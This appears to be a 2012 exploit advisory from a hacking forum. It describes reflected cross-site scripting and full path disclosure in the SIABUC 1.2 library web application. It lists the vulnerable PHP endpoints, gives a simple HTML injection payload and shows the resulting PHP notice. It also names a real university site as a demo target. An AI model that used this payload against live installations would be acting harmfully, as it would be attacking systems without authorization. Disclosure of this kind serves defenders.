Underc0de

# Author: Mazt0r
# Exploit Title: XSS & Full Path Disclosure SIABUC
# Date: 24/02/2012
# software: SIABUC
# link: http://siabuc.ucol.mx/
# Version: Version 1.2 [Other versions "NO TESTED"]
# Category: webapps Library
# Tested on: Linux

Demo:http://www.cidcacs.iis.ucr.ac.cr/

----------------
Vulnerable
----------------
/reservacion/index.php
/reservacion/include/buscar.php

Exploit:
======================

http://localhost/reservacion/index.php

POST: XSS
Result: /reservacion/include/buscar.php
======================
Example:
======================

|---------------------|
|" > < h1 > A < / h1 >|
|---------------------|
\
- Execution Code

Result FPD: Notice: Trying to get property of non-object in C:\ABCSIS\Reservacion\include\buscarws.php on line ***


"© Derechos reservados 2010, Universidad de Colima. Página desarrollada por el departamento de SIABUC"

----------------------------------
Blog: maztor.blogspot.com
Twitter: @Mazt0r
----------------------------------